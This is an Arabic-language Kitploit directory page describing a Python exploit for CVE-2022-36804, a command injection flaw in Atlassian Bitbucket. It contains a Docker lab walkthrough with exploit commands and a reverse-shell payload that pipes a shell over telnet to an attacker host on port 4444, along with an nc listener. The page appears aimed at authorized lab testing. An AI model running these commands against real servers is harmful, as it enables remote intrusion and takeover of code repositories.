Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-36804 — استغلال بلغة Python لـ CVE-2022-36804، حقن أوامر في Atlassian Bitbucket Server و Data Center، يتيح تنفيذ تعليمات برمجية عن بُعد بصلاحيات القراءة. | Kitploit
أدوات/GitHubGitHub/asepsaepdin/cve-2022-36804
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

استغلال بلغة Python لـ CVE-2022-36804، حقن أوامر في Atlassian Bitbucket Server و Data Center، يتيح تنفيذ تعليمات برمجية عن بُعد بصلاحيات القراءة.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-36804 - ثغرة حقن الأوامر في خادم Atlassian Bitbucket ومركز البيانات

Python


⚠️ لأغراض تعليمية وبحث أمني مصرح به فقط

مؤلفو الاستغلال الأصليون

شكر جزيل لمؤلف الإثبات العملي الأصلي Walnut Security Services Pvt. Ltd

الوصف

تسمح نقاط نهاية API متعددة في خادم Atlassian Bitbucket ومركز البيانات الإصدارات 7.0.0 قبل 7.6.17، ومن 7.7.0 قبل 7.17.10، ومن 7.18.0 قبل 7.21.4، ومن 8.0.0 قبل 8.0.3، ومن 8.1.0 قبل 8.1.3، ومن 8.2.0 قبل 8.2.2، ومن 8.3.0 قبل 8.3.1 للمهاجمين عن بعد الذين لديهم صلاحيات قراءة على مستودع Bitbucket عام أو خاص بتنفيذ تعليمات برمجية عشوائية عن طريق إرسال طلب HTTP ضار. تم الإبلاغ عن هذه الثغرة عبر برنامج مكافآت الأخطاء لدينا بواسطة TheGrandPew.


دليل الخطوات

  1. أولاً، استنساخ المستودع

root@kitploit:~
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
  • تغيير الدليل

    root@kitploit:~
    cd CVE-2022-36804
    
  • بناء حاوية الثغرة

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  • تشغيل حاوية مؤقتة

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  • التحقق من عنوان IP للحاوية

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  • إعداد Atlassian Bitbucket وإنشاء مستودع عام جديد عن طريق فتح الرابط: http://172.17.0.3:7990

  • التحقق من تنفيذ الأوامر عن بعد (RCE)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  • التحقق من RCE مع أمر مخصص (cmd)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  • من منظور المهاجم، تنفيذ الأوامر عن بعد أمر بالغ الأهمية للوصول إلى شيل تفاعلي. لذا، تشغيل الأمر التالي سيؤدي إلى تشغيل شيل عكسي عبر telnet على tcp استنادًا إلى bash إلى نظام المهاجم على المنفذ 4444/tcp:

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    root@kitploit:~
    nc -nlvp 4444
    

  • الاعتمادات

    • https://github.com/walnutsecurity/cve-2022-36804
    • https://nvd.nist.gov/vuln/detail/cve-2022-36804
    تنزيل الأداة